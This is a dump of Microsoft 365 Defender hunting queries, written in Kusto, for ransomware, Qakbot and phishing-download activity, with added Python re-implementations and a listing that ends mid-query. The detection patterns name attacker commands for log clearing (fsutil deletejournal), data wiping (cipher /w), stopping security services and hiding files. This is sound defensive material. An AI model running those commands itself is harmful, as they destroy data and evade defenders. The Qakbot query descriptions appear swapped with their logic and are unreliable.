InitiatingProcessCommandLine has_any (regparams4)) | extend Account = iff(isnotempty(InitiatingProcessAccountUpn), InitiatingProcessAccountUpn, InitiatingProcessAccountName), Computer = DeviceName | project Timestamp, Computer, Account, AccountDomain, ProcessName = InitiatingProcessFileName, ProcessNameFullPath = FolderPath, Activity = ActionType, CommandLine = InitiatingProcessCommandLine, InitiatingProcessParentFileName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | V | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Defense evasion/UpdateStsRefreshToken[Solorigate].md ================================================ # Security Token Service (STS) refresh token modifications This will show Active Directory Security Token Service (STS) refresh token modifications by Service Principals and Applications other than DirectorySync. Refresh tokens are used to validate identification and obtain access tokens. This event is most often generated when legitimate administrators troubleshoot frequent AAD user sign-ins but may also be generated as a result of malicious token extensions. 
Confirm that the activity is related to an administrator legitimately modifying STS refresh tokens, and check the new token validation time period for high values.

Query inspired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/StsRefreshTokenModification.yaml

## Query

```Kusto
CloudAppEvents
| where ActionType == "Update StsRefreshTokenValidFrom Timestamp."
| where RawEventData !has "Directorysync"
| extend displayName = RawEventData.ModifiedProperties[0].Name
| where displayName == "StsRefreshTokensValidFrom"
| extend oldValue = RawEventData.ModifiedProperties[0].OldValue
| extend newValue = RawEventData.ModifiedProperties[0].NewValue
| extend oldStsRefreshValidFrom = todatetime(parse_json(tostring(oldValue))[0])
| extend newStsRefreshValidFrom = todatetime(parse_json(tostring(newValue))[0])
| extend tokenMinutesAdded = datetime_diff('minute',newStsRefreshValidFrom,oldStsRefreshValidFrom)
| extend tokenMinutesRemaining = datetime_diff('minute',Timestamp,newStsRefreshValidFrom)
| extend Role = parse_json(RawEventData.Actor[-1]).ID
| distinct AccountObjectId, AccountDisplayName, tostring(Role), IPAddress, IsAnonymousProxy, ISP, tokenMinutesAdded, tokenMinutesRemaining
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | V | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Stefan Sellmer
**GitHub alias:** @stesell
**Organization:** Microsoft 365 Defender
**Contact info:** stesell@microsoft.com

================================================
FILE: Defense evasion/alt-data-streams.md
================================================
# Detect use of Alternate Data Streams

This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/).

In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques.

The following query detects suspicious use of [Alternate Data Streams](https://docs.microsoft.com/sysinternals/downloads/streams) (ADS), which may indicate an attempt to mask malicious activity. These campaigns have been known to deploy ransomware in-memory and exploit ADS.

The [See also](#see-also) section below lists more queries related to techniques shared by these campaigns.
## Query

```Kusto
// Alternate Data Streams execution
DeviceProcessEvents
| where Timestamp > ago(7d)
// Command lines used
| where ProcessCommandLine startswith "-q -s" and ProcessCommandLine hasprefix "-p"
// Removing IDE processes
    and not(FolderPath has_any("visual studio", "ide"))
| summarize make_set(ProcessCommandLine), make_set(FolderPath), make_set(InitiatingProcessCommandLine) by DeviceId, bin(Timestamp, 1h)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Return backup files deletion events](../Impact/backup-deletion.md)
* [Detect attempts to turn off System Restore](./turn-off-system-restore.md)
* [Detect cipher.exe deleting data](./deleting-data-w-cipher-tool.md)
* [Detect clearing of system logs](./clear-system-logs.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Defense evasion/clear-system-logs.md
================================================
# Detect clearing of system logs

This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/).

In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques.
The following query detects attempts to use *fsutil.exe* to clear system logs and delete forensic artifacts.

The [See also](#see-also) section below lists more queries related to techniques shared by these campaigns.

## Query

```Kusto
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "fsutil.exe" and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Return backup files deletion events](../Impact/backup-deletion.md)
* [Detect use of Alternate Data Streams](./alt-data-streams.md)
* [Detect attempts to turn off System Restore](./turn-off-system-restore.md)
* [Detect cipher.exe deleting data](./deleting-data-w-cipher-tool.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Defense evasion/deleting-data-w-cipher-tool.md
================================================
# Detect cipher.exe deleting data

This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/).

In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques.
The following query detects the use of the tool *cipher.exe* to delete indicators of malicious activity right before encrypting a drive.

The [See also](#see-also) section below lists more queries related to techniques shared by these campaigns.

## Query

```Kusto
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "cipher.exe"
// Looking for /w flag for deleting
| where ProcessCommandLine has "/w"
| summarize CommandCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m)
// Looking for multiple drives in a short timeframe
| where CommandCount > 1
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Return backup files deletion events](../Impact/backup-deletion.md)
* [Detect use of Alternate Data Streams](./alt-data-streams.md)
* [Detect attempts to turn off System Restore](./turn-off-system-restore.md)
* [Detect clearing of system logs](./clear-system-logs.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Defense evasion/doppelpaymer-stop-services.md
================================================
# Detect DoppelPaymer operators stopping services

This query was originally published in the threat analytics report, *Doppelpaymer: More human-operated ransomware*. There is also a related [blog](https://msrc-blog.microsoft.com/2019/11/20/customer-guidance-for-the-dopplepaymer-ransomware/).
[DoppelPaymer](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoppelPaymer!MTB&threatId=-2147205372) is ransomware that is spread manually by human operators. These operators have exhibited extensive knowledge of system administration and common network security misconfigurations. They often use stolen credentials from over-privileged service accounts to turn off security software, run malicious commands, and spread malware throughout an organization.

The following query detects attempts to stop security services.

The [See also](#see-also) section below lists links to other queries associated with DoppelPaymer.

## Query

```Kusto
// Attempts to stop services and allow ransomware execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName startswith "psexe"
    and FileName =~ "powershell.exe"
    and ProcessCommandLine has "stop-service"
    and ProcessCommandLine has "sql"
    and ProcessCommandLine has "msexchange"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Detect DoppelPaymer performing reconnaissance with net.exe](../Discovery/doppelpaymer.md)
* [Detect DoppelPaymer operators spreading files with PsExec](../Lateral%20Movement/doppelpaymer-psexec.md)
* [Detect DoppelPaymer operators dumping credentials with ProcDump](../Credential%20Access/doppelpaymer-procdump.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Defense evasion/hiding-java-class-file.md
================================================
# Hiding a Java class file

This query was originally published in the threat analytics report, *Adwind utilizes Java for cross-platform impact*.

Adwind is a remote access tool (RAT) that takes advantage of the cross-platform capabilities of the Java framework. It can check which operating system a target is running and adapt accordingly, allowing it to successfully compromise both Windows and macOS devices.

The query below checks for attempts to disguise Java class files (i.e., compiled code with a *.class* extension). Although the behavior detected by this query is typical of attacks that use Adwind malware, unrelated attacks may use the same or similar defense evasion techniques.

See [Detecting a JAR attachment](../Initial%20access/jar-attachments.md) for an additional query that detects behavior associated with Adwind attacks.
## Query

```kusto
union DeviceFileEvents, DeviceProcessEvents
| where ProcessCommandLine has "attrib +h +s +r " and ProcessCommandLine contains ".class"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Defense evasion/locate-files-possibly-signed-by-fraudulent-ecc-certificates.md
================================================
# Locate files possibly signed by fraudulent ECC certificates

This query was originally published in the threat analytics report, *CVE-2020-0601 certificate validation vulnerability*.

The Windows CryptoAPI Spoofing Vulnerability, [CVE-2020-0601](https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-0601), can be exploited to spoof code-signing certificates. For example, an attacker could forge a certificate that lists Microsoft as the issuer. This would allow an attacker to disguise a malicious executable as legitimate.

The vulnerability was patched with the [January 2020 Security Update](https://portal.msrc.microsoft.com/security-guidance/releasenotedetail/2020-Jan).

Use the following query to locate files containing ECC certificates that might have been forged using this vulnerability. The query identifies files that don't correctly identify the signer name, yet list *Microsoft* as the root signer.
## Query

```Kusto
DeviceFileCertificateInfo
| where Timestamp > ago(30d)
| where IsSigned == 1 and IsTrusted == 1 and IsRootSignerMicrosoft == 1
| where SignatureType == "Embedded"
| where Issuer !startswith "Microsoft" and Issuer !startswith "Windows"
| project Timestamp, DeviceName, SHA1, Issuer, IssuerHash, Signer, SignerHash, CertificateCreationTime, CertificateExpirationTime, CrlDistributionPointUrls
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection Team

================================================
FILE: Defense evasion/qakbot-campaign-process-injection.md
================================================
# Process injection by Qakbot malware

This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware*.

[Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services. It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#see-also).

The following query detects if Qakbot has injected code into the *ping.exe* process, to evade security and access credentials.
## Query

```Kusto
DeviceProcessEvents
| where FileName == "esentutl.exe"
| where ProcessCommandLine has "WebCache"
| where ProcessCommandLine has_any ("V01", "/s", "/d")
| project ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Registry edits by campaigns using Qakbot malware](../Persistence/qakbot-campaign-self-deletion.md)
* [Self-deletion by Qakbot malware](../Defense%20evasion/qakbot-campaign-registry-edit.md)
* [Browser cookie theft by campaigns using Qakbot malware](../Discovery/qakbot-campaign-esentutl.md)
* [Outlook email access by campaigns using Qakbot malware](../Discovery/qakbot-campaign-outlook.md)
* [Javascript use by Qakbot malware](../Execution/qakbot-campaign-suspicious-javascript.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Defense evasion/qakbot-campaign-self-deletion.md
================================================
# Self-deletion by Qakbot malware

This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware*.

[Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services.
It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#see-also).

The following query detects if an instance of Qakbot has attempted to overwrite its original binary.

## Query

```Kusto
DeviceProcessEvents
| where FileName =~ "ping.exe"
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has "calc.exe"
    and InitiatingProcessCommandLine has "-n 6"
    and InitiatingProcessCommandLine has "127.0.0.1"
| project ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Registry edits by campaigns using Qakbot malware](../Persistence/qakbot-campaign-registry-edit.md)
* [Process injection by Qakbot malware](../Defense%20evasion/qakbot-campaign-process-injection.md)
* [Browser cookie theft by campaigns using Qakbot malware](../Discovery/qakbot-campaign-esentutl.md)
* [Outlook email access by campaigns using Qakbot malware](../Discovery/qakbot-campaign-outlook.md)
* [Javascript use by Qakbot malware](../Execution/qakbot-campaign-suspicious-javascript.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Delivery/Doc attachment with link to download.txt
================================================
// This query looks for a Word document attachment, from which a link was clicked, and after which there was a browser download.
// This query is not noisy, but most of its results are clean.
// It can also serve as a reference for other queries on email attachments, on browser downloads, or for queries that join multiple events by time.
// Tags: #EmailAttachment, #WordLink, #BrowserDownload, #Phishing, #DedupFileCreate
//
// Implementation comment #1: Matching events by time
// Matching the 3 different events (saving attachment, clicking on link, downloading file) is done purely by time difference - so it could sometimes link together unrelated events.
// Doing a more exact lookup would create a much more complex query due to
//
// Implementation comment #2: Deduping DeviceFileEvents
// Oftentimes there are multiple DeviceFileEvents for a single file - e.g. if the file keeps being appended to before being closed.
// So, we query only for the last reported file state to ignore intermediate file states.
//
// Explaining the underlying data:
// BrowserLaunchedToOpenUrl event:
// This query uses the BrowserLaunchedToOpenUrl event, which includes clicks on http:// or https:// links (clicks outside of browsers), or on .lnk files.
// For this event, RemoteUrl contains the opened URL.
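The two implementation comments above (matching the three events purely by time difference, and keeping only the last reported state of a file) are the parts of this query that are easiest to get subtly wrong, so here is an added Python re-implementation of the same correlation over a handful of constructed events. It is not part of the original query file; the device names, file names, URLs and hash strings in it are made up.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed stand-ins for the DeviceEvents / DeviceFileEvents columns the query uses.
@dataclass(frozen=True)
class FileEvent:            # one DeviceFileEvents row
    ts: datetime
    device: str
    file_name: str
    initiating: str         # InitiatingProcessFileName
    sha1: str = ""
    origin_url: str = ""    # FileOriginUrl

@dataclass(frozen=True)
class ClickEvent:           # one DeviceEvents row with ActionType == BrowserLaunchedToOpenUrl
    ts: datetime
    device: str
    initiating: str
    url: str                # RemoteUrl

DOC_EXTENSIONS = (".docx", ".docm", ".doc")
MAIL_CLIENTS = {"outlook.exe", "hxoutlook.exe"}
BROWSERS = {"browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe"}
WINDOW = timedelta(minutes=3)      # the query's (0min..3min) windows

def doc_attachments(file_events):
    """Earliest save time per (device, attachment name): summarize min(Timestamp)."""
    first_seen = {}
    for e in file_events:
        if e.initiating.lower() in MAIL_CLIENTS and e.file_name.lower().endswith(DOC_EXTENSIONS):
            key = (e.device, e.file_name)
            if key not in first_seen or e.ts < first_seen[key]:
                first_seen[key] = e.ts
    return first_seen

def browser_downloads(file_events):
    """Last reported state per (device, file, origin URL): the arg_max dedup that
    drops intermediate DeviceFileEvents emitted while a file is still being written."""
    last_state = {}
    for e in file_events:
        name = e.file_name.lower()
        if e.initiating.lower() not in BROWSERS:
            continue
        if name.endswith(".js") and not e.origin_url:       # scripts loaded by pages
            continue
        if name.endswith(".partial") or name.endswith(".docx"):
            continue
        key = (e.device, e.file_name, e.origin_url)
        if key not in last_state or e.ts > last_state[key].ts:
            last_state[key] = e
    return last_state

def in_window(delta):
    return timedelta(0) <= delta <= WINDOW

def correlate(click_events, file_events):
    """Attachment saved -> link clicked from WinWord -> browser download, each within 3 minutes,
    all on the same device; attachments saved under several names are grouped per download."""
    saves = doc_attachments(file_events)
    downloads = browser_downloads(file_events)
    hits = []
    for click in click_events:
        if click.initiating.lower() != "winword.exe" or not click.url:
            continue
        attachments = sorted(name for (dev, name), saved in saves.items()
                             if dev == click.device and in_window(click.ts - saved))
        if not attachments:
            continue
        for (dev, _, _), dl in downloads.items():
            if dev == click.device and in_window(dl.ts - click.ts):
                hits.append({"device": dev, "attachments": attachments, "click_url": click.url,
                             "downloaded_file": dl.file_name, "origin_url": dl.origin_url,
                             "sha1": dl.sha1, "download_time": dl.ts})
    return hits

# Constructed sample telemetry (all names, URLs and hashes are made up).
T0 = datetime(2021, 3, 1, 9, 0, 0)
SAMPLE_FILE_EVENTS = [
    FileEvent(T0, "WKS01", "invoice.docx", "outlook.exe"),
    FileEvent(T0 + timedelta(seconds=5), "WKS01", "invoice.docx", "outlook.exe"),      # later write, same file
    FileEvent(T0 + timedelta(seconds=2), "WKS01", "invoice (1).docx", "outlook.exe"),  # same attachment, second name
    FileEvent(T0 + timedelta(seconds=90), "WKS01", "payload.exe", "chrome.exe", "", "https://cdn.example.invalid/payload.exe"),
    FileEvent(T0 + timedelta(seconds=95), "WKS01", "payload.exe", "chrome.exe", "CONSTRUCTED-SHA1-FINAL", "https://cdn.example.invalid/payload.exe"),
    FileEvent(T0 + timedelta(seconds=92), "WKS01", "site.js", "chrome.exe"),           # page script, no origin URL
    FileEvent(T0 + timedelta(minutes=10), "WKS01", "tool.exe", "chrome.exe", "CONSTRUCTED-SHA1-LATE", "https://cdn.example.invalid/tool.exe"),
    FileEvent(T0 + timedelta(seconds=30), "WKS02", "memo.pdf", "chrome.exe", "CONSTRUCTED-SHA1-PDF", "https://example.invalid/memo.pdf"),
]
SAMPLE_CLICK_EVENTS = [
    ClickEvent(T0 + timedelta(seconds=60), "WKS01", "winword.exe", "https://example.invalid/get"),
    ClickEvent(T0 + timedelta(seconds=10), "WKS02", "winword.exe", "https://example.invalid/other"),  # no attachment saved on WKS02
]

def run_sample():
    return correlate(SAMPLE_CLICK_EVENTS, SAMPLE_FILE_EVENTS)

if __name__ == "__main__":
    for hit in run_sample():
        print(hit)
```

Only the WKS01 chain survives: the two intermediate states collapse to the final `payload.exe` record, the `.js` and late `tool.exe` downloads are dropped, and WKS02 has a click but no preceding attachment.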
let minTimeRange = ago(7d);
let wordLinks =
    DeviceEvents
    // Filter on clicks on links from WinWord
    | where Timestamp > minTimeRange
        and ActionType == "BrowserLaunchedToOpenUrl"
        and isnotempty(RemoteUrl)
        and InitiatingProcessFileName =~ "winword.exe"
    | project ClickTime=Timestamp, DeviceId, DeviceName, ClickUrl=RemoteUrl;
let docAttachments =
    DeviceFileEvents
    | where Timestamp > minTimeRange
        // Query for common document file extensions
        and (FileName endswith ".docx" or FileName endswith ".docm" or FileName endswith ".doc")
        // Query for files saved from email clients such as the Office Outlook app or the Windows Mail app
        and InitiatingProcessFileName in~ ("outlook.exe", "hxoutlook.exe")
    | summarize AttachmentSaveTime=min(Timestamp) by AttachmentName=FileName, DeviceId;
let browserDownloads =
    DeviceFileEvents
    | where Timestamp > minTimeRange
        // Query for files created by common browsers
        and InitiatingProcessFileName in~ ("browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe")
        // Exclude JS files that are used for loading sites (but still query for JS files that are known to be downloaded)
        and not (FileName endswith ".js" and isempty(FileOriginUrl))
    // Further filter to exclude file extensions that are less indicative of an attack (given that a doc attachment containing a link was already saved)
    | where FileName !endswith ".partial" and FileName !endswith ".docx"
    // Keep only the last reported state of each downloaded file (see implementation comment #2)
    | summarize (Timestamp, SHA1) = argmax(Timestamp, SHA1) by FileName, DeviceId, FileOriginUrl;
// Perf tip: start the joins from the smallest table (put it on the left-most side of the joins)
wordLinks
| join kind=inner (docAttachments) on DeviceId
| where ClickTime - AttachmentSaveTime between (0min..3min)
| join kind=inner (browserDownloads) on DeviceId
| where Timestamp - ClickTime between (0min..3min)
// Aggregate multiple "attachments" together - because oftentimes the same file is stored multiple times under different names
| summarize Attachments=makeset(AttachmentName),
    AttachmentSaveTime=min(AttachmentSaveTime), ClickTime=min(ClickTime)
    by // Downloaded file details
    bin(Timestamp, 1tick), FileName, FileOriginUrl, ClickUrl, SHA1, DeviceName, DeviceId

================================================
FILE: Delivery/Dropbox downloads linked from other site.txt
================================================
// This query looks for user content downloads from Dropbox that originate from a link/redirect from a 3rd-party site.
// File sharing sites such as Dropbox are often used for hosting malware on a reputable site.
// Read more about download URL data and about this attack vector in this blog post:
// https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454
// Tags: #DownloadUrl, #Referer, #Dropbox
DeviceFileEvents
| where Timestamp > ago(7d)
    and FileOriginUrl startswith "https://dl.dropboxusercontent.com/"
    and isnotempty(FileOriginReferrerUrl)
    and FileOriginReferrerUrl !startswith "https://www.dropbox.com/"
| project FileOriginReferrerUrl, FileName

================================================
FILE: Delivery/Email link + download + SmartScreen warning.txt
================================================
// Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning that was ignored by the user.
// Read more about these events and this hunting approach in this post: https://techcommunity.microsoft.com/t5/forums/editpage/board-id/WDATPActor/message-id/34
// Data availability: SmartScreen events are available only on Windows 10 version 1703 and onwards.
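// Added example (not part of this query file or the repository): the two building blocks of the query below, written in Python over
// constructed sample events so they can be run offline. unwrap_safelink() does what the query's parse_url()/url_decode() expression does
// for a safelinks.protection.outlook.com rewrite, and overridden_warnings() is the leftsemi join that keeps a SmartScreenAppWarning only
// when a SmartScreenUserOverride with the same ActivityId was seen on the same device. The same Safe Links unwrapping is used by the two
// "Open email link" queries later in this listing. The AdditionalFields layout ({"ActivityId": ...}) follows the query's extractjson path;
// device names, file names, hashes, ActivityId values and URLs are made up.

```python
import json
from urllib.parse import parse_qs, urlparse

SAFELINKS_SUFFIX = "safelinks.protection.outlook.com"

# Constructed sample URL in the Safe Links wrapper shape: the original link is percent-encoded in the "url" query parameter.
SAFELINK_SAMPLE = ("https://nam01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fexample.test%2Fdownload%2Fsetup.exe"
                   "&data=04%7C01%7Cuser%40example.test&reserved=0")

# Constructed DeviceEvents rows with only the columns the logic needs. AdditionalFields is the JSON string the query reads with extractjson.
SAMPLE_DEVICE_EVENTS = [
    {"ActionType": "BrowserLaunchedToOpenUrl", "DeviceName": "ws1", "InitiatingProcessFileName": "OUTLOOK.EXE",
     "RemoteUrl": SAFELINK_SAMPLE},
    {"ActionType": "SmartScreenAppWarning", "DeviceName": "ws1", "FileName": "setup.exe", "SHA1": "a" * 40,
     "AdditionalFields": json.dumps({"ActivityId": "0b1d-1", "Experience": "UnknownApp"})},
    {"ActionType": "SmartScreenUserOverride", "DeviceName": "ws1",
     "AdditionalFields": json.dumps({"ActivityId": "0b1d-1"})},
    {"ActionType": "SmartScreenAppWarning", "DeviceName": "ws1", "FileName": "tool.exe", "SHA1": "b" * 40,
     "AdditionalFields": json.dumps({"ActivityId": "0b1d-2"})},            # warned, never overridden: the user backed out
    {"ActionType": "SmartScreenAppWarning", "DeviceName": "ws2", "FileName": "setup.exe", "SHA1": "a" * 40,
     "AdditionalFields": json.dumps({"ActivityId": "0b1d-1"})},            # same ActivityId on another device: no override there
]


def unwrap_safelink(url):
    """Return the link the user was actually sent if `url` is an Outlook Safe Links rewrite, else `url` unchanged.
    Mirrors iff(host endswith "safelinks...", url_decode(parse_url(RemoteUrl)["Query Parameters"]["url"]), RemoteUrl)."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if not host.endswith(SAFELINKS_SUFFIX):
        return url
    inner = parse_qs(parsed.query).get("url")   # parse_qs percent-decodes the value, like url_decode()
    return inner[0] if inner else url           # a wrapper without url= is kept rather than dropped


def activity_id(event):
    """extractjson("$.ActivityId", AdditionalFields): None when the field is missing or not JSON."""
    try:
        return json.loads(event.get("AdditionalFields") or "{}").get("ActivityId")
    except json.JSONDecodeError:
        return None


def overridden_warnings(device_events):
    """The query's leftsemi join: SmartScreenAppWarning rows whose (DeviceName, ActivityId) also occurs on a
    SmartScreenUserOverride row. Nothing from the override row is carried into the result."""
    overrides = {(e["DeviceName"], activity_id(e))
                 for e in device_events if e["ActionType"] == "SmartScreenUserOverride"}
    return [e for e in device_events
            if e["ActionType"] == "SmartScreenAppWarning"
            and activity_id(e) is not None
            and (e["DeviceName"], activity_id(e)) in overrides]


def mail_links(device_events):
    """Links opened from outlook.exe, with Safe Links wrappers replaced by the original link."""
    return [{"DeviceName": e["DeviceName"], "MailLink": unwrap_safelink(e["RemoteUrl"])}
            for e in device_events
            if e["ActionType"] == "BrowserLaunchedToOpenUrl"
            and e.get("InitiatingProcessFileName", "").lower() == "outlook.exe"
            and e.get("RemoteUrl")]


if __name__ == "__main__":
    print(mail_links(SAMPLE_DEVICE_EVENTS))
    for warning in overridden_warnings(SAMPLE_DEVICE_EVENTS):
        print(warning["DeviceName"], warning["FileName"], warning["SHA1"])
```

// On the sample data only the setup.exe warning on ws1 survives: tool.exe was never overridden, and the ws2 warning shares an ActivityId
// with the ws1 override but not the device, which is exactly why the query joins on both DeviceName and ActivityId.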
// Tags: #EmailLink, #BrowserDownload, #SmartScreen
let smartscreenAppWarnings =
    // Query for SmartScreen warnings of unknown executed applications
    DeviceEvents
    | where ActionType == "SmartScreenAppWarning"
    | project WarnTime=Timestamp, DeviceName, WarnedFileName=FileName, WarnedSHA1=SHA1,
        ActivityId=extractjson("$.ActivityId", AdditionalFields, typeof(string))
    // Select only warnings that the user has decided to ignore and has executed the app.
    | join kind=leftsemi (
            DeviceEvents
            | where ActionType == "SmartScreenUserOverride"
            | project DeviceName, ActivityId=extractjson("$.ActivityId", AdditionalFields, typeof(string)))
        on DeviceName, ActivityId
    | project-away ActivityId;
// Query for links opened from outlook, that are close in time to a SmartScreen warning
let emailLinksNearSmartScreenWarnings =
    DeviceEvents
    | where ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl) and InitiatingProcessFileName =~ "outlook.exe"
    | extend WasOutlookSafeLink=(tostring(parse_url(RemoteUrl).Host) endswith "safelinks.protection.outlook.com")
